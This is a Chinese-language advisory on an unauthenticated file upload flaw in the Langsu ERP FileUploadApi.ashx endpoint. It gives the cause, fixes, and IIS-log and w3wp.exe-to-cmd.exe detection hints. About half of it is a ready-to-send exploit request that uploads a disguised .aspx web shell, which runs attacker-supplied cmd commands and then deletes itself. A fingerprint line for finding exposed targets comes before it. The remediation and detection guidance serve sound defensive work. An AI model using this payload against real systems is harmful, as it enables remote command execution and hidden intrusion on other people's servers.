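朗速ERP系统FileUploadApi.ashx存在文件上传漏洞

漏洞成因（据下方示例请求）：`/Api/FileUploadApi.ashx?method=DoWebUpload` 接受了文件名为 `1.aspx`、Content-Type 却声明为 `image/jpeg` 的上传内容，说明服务端没有校验扩展名，或只信任了客户端提供的 Content-Type。若上传目录允许脚本执行，该文件会被当作 ASP.NET 页面解析。示例请求未携带 Cookie 或认证头，该接口可能无需登录即可访问（待确认）。

示例上传的页面把请求参数 `cmd` 拼接到 `cmd /c` 后执行并回显输出，随后调用 `File.Delete(Request.PhysicalPath)` 删除自身。因此磁盘上找不到该文件并不能排除已被利用。

修复与排查：
- 在服务端按白名单限制上传扩展名，不依赖 Content-Type。
- 将上传文件保存在 Web 根目录之外，或在上传目录禁用脚本处理程序。
- 对该接口强制身份认证。
- 在 IIS 日志中检索对 `/Api/FileUploadApi.ashx` 且 `method=DoWebUpload` 的 POST 请求，以及随后对上传目录中 `.aspx` 文件的访问。
- 结合进程创建日志检查 `w3wp.exe` 是否派生了 `cmd.exe`。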
body = "/Resource/Scripts/Yw/Yw_Bootstrap.js"
POST / Api / FileUploadApi . ashx ?method = DoWebUpload HTTP / 1.1
Host :
User - Agent : Mozilla / 5.0 ( Macintosh ; Intel Mac OS X 10_15_7 ) AppleWebKit / 537.36 ( KHTML , like Gecko ) Chrome / 107.0 .0 .0 Safari / 537.36
Accept - Encoding : gzip , deflate
Content - Type : multipart / form - data ; boundary = -- -- WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept : * / *
Connection : close
-- -- -- WebKitFormBoundaryFfJZ4PlAZBixjELj
Content - Disposition : form - data ; name = "file" ; filename = "1.aspx"
Content - Type : image / jpeg
< % @ Page Language = "Jscript" validateRequest = "false" % >
< %
var c = new System . Diagnostics . ProcessStartInfo ( "cmd" ) ;
var e = new System . Diagnostics . Process ( ) ;
var out :System . IO . StreamReader , EI :System . IO . StreamReader ;
c . UseShellExecute = false ;
c . RedirectStandardOutput = true ;
c . RedirectStandardError = true ;
e . StartInfo = c ;
c . Arguments = "/c " + Request . Item [ "cmd" ] ;
e . Start ( ) ;
out = e . StandardOutput ;
EI = e . StandardError ;
e . Close ( ) ;
Response . Write ( out . ReadToEnd ( ) + EI . ReadToEnd ( ) ) ;
System . IO . File . Delete ( Request . PhysicalPath ) ;
Response . End ( ) ; % >
-- -- -- WebKitFormBoundaryFfJZ4PlAZBixjELj --